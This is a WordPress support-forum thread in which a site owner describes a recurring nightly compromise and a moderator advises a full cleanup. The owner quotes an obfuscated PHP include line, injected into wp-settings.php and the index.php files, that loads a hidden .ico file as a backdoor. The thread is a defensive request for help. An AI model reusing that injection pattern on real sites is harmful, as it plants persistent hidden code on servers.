Site hacked

  • Every night shortly after midnight, apache logs show a request to our site:
    /wp/wp-admin/includes/upgrade.php

    It does all this:
    – Chmod 755 to /var/www/html
    – Changes wp-settings.php source to include at the top a line like this:
    @include “\057var\057www\057htm\154/we\142ima\147es/\155oto\157nly\057.b2\067841\067f.i\143o”;
    – it changes index.php in root to include that same line
    – it changes all index.php in subfolders that are available to users for uploading data to include that same line
    – In some random folder it installs an object called something like .c8981bb4.ico

    A few seconds after it has done that, apache log shows a new request to server with something like:
    /mtc/?kfog=7le
    or, alternatively
    /webimages/someotherfoldersforupload/abcdefgh.php
    (abcdefgh can be any 8 character long sequence).

    It doesnt seem to do any harm as site is working properly and there is no unusual network traffic that can be observed.

    Wordpress and all plugins are on the very last version. Not needed plugins and themes have all been removed.

    Securi shows that wp-settings has been changed and I can repair it every morning without problem.

    So the question really is, as everything is at the latest version, how is it possible that /wp/wp-admin/includes/upgrade.php is allowed to create this mess?

Viewing 3 replies - 1 through 3 (of 3 total)
  • Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

    Thread Starter clauderoe

    (@clauderoe)

    Yes I know this guide and all the security measures and have done all of it.
    But it remains that a core WP program (/wp-admin/includes/upgrade.php) is doing something that it shouldn’t.
    And Securi does not complain about it…

    So, any other suggestions?

    Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    If your site is hacked, bad code could be telling your site to do bad things. It’s also possible that your host has issues.

    Replace EVERY SINGLE php file on your site with ones from the original sources. Examine all .htaccess files, look at wp-config.php carefully.

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Site hacked’ is closed to new replies.